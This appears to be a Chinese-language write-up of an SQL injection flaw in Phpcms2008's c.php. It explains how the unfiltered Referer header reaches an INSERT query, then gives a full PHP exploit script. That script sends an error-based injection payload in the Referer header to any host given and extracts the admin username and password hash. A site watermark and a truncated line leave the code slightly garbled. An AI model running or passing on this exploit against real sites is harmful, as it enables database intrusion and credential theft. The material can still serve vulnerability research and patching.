漏洞文件/c.php
require './ads/include/common.inc.php';
$id = intval($id);
$ads = $c_ads->get_info($id);
if($ads)
{
$db->query("UPDATE ".DB_PRE."ads SET `clicks`=clicks+1 WHERE adsid=".$ads['adsid']);
$info['username'] = $_username;
$info['clicktime'] = time();
$info['ip'] = IP;
$info['adsid'] = $id;
$info['referer'] = HTTP_REFERER;//直接赋值
$year = date('ym',TIME);
$table = DB_PRE.'ads_'.$year;
$table_status = $db->table_status($table);
if(!$table_status) {
include MOD_ROOT.'include/create.table.php';
}
$db->insert($table, $info);//进行数据库查询
$url = strpos($ads['linkurl'], 'http://')===FALSE ? 'http://'.$ads['linkurl'] : $ads['linkurl'];
}
?>
而define('HTTP_REFERER', isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '');
可见我们可以控制HTTP_REFERER,而且不受GPC控制。
$db->insert函数如下:
function insert($tablename, $array)
{
$this->check_fields($tablename, $array);
return $this->query("INSERT INTO `$tablename`(`".implode('`,`', array_keys($array))."`) VALUES('".implode("','", $array)."')");
}
下面是exp
--------------------begain--------------
print "\n+------------------------------------------------------+";
print "\n| Phpcms2008 /c.php SQL injection Exploit by qingsh4n |";
print "\n+------------------------------------------------------+\n";
$match = array();
if ($argc
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /phpcms/\n";
die();
}
$query_string = $argv[2]."c.php?id=1";
$host = $argv[1];
//$path = ereg_replace("(/){2,}", "/", $argv[2]);
print "[+]Exp is posting data!\n";
$return_data = post_request($host, $query_string);
//echo $return_data;
//preg_match("/Duplicate entry '~(.*)~(.*)~1' for key/", $return_data, $match);
//print_r($a);
if(preg_match("/Duplicate entry '~(.*)~(.*)~1' for key/", $return_data, $match)){
print "[+]It's ok!\n";
print "[+]Usrname is: $match[1]\n";
print "[+]Password is: $match[2]\n";
die("[+]Bye");
}
if(preg_match("/Bad Request/", $return_data)){
print "[-]May be error switch off!\n";
die("[-]Bye");
} www.2cto.com
if(preg_match("/Table 'phpcms.phpcms_member' doesn't exist/", $return_data)){
preg_match("/INSERT INTO `(.*)_ads_1211/", $return_data, $match);
print "[-]May be database Prefix changed!\n";
print "[-]Database Prefix is: $match[1]\n";
print "[-]Please change payload by yourself!\n";
die("[-]Bye");
}else{
print "[-]May be not affected!\n";
die("[-]Bye");
}
function post_request($remote_server, $remote_path, $post_string = "", $port = 80, $timeout = 30){
$payload = "Referer: qingshen'),('','1353245103','121.8.210.25',(select 2 from(select count(*),concat((select (select (select concat(0x7e,phpcms_member.username,0x7e,phpcms_member.password,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)),('admin','1353245103','121.8.210.205','1','qingshen";
$socket = fsockopen($remote_server, $port, $errno, $errstr, $timeout);
if (!$socket) die("$errstr($errno)");
fwrite($socket, "GET $remote_path HTTP/1.0\r\n");
fwrite($socket, "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0\r\n");
fwrite($socket, "Host: $remote_server\r\n");
fwrite($socket, "Content-type: application/x-www-form-urlencoded\r\n");
fwrite($socket, "Accept:*/*\r\n");
fwrite($socket, "Referer: $payload\r\n");
fwrite($socket, "\r\n");
$header = "";
while ($str = trim(fgets($socket, 4096))) {
$header .= $str;
}
$data = "";
while (!feof($socket)) {
$data .= fgets($socket, 4096);
}
return $data;
}
------------------------end---------------------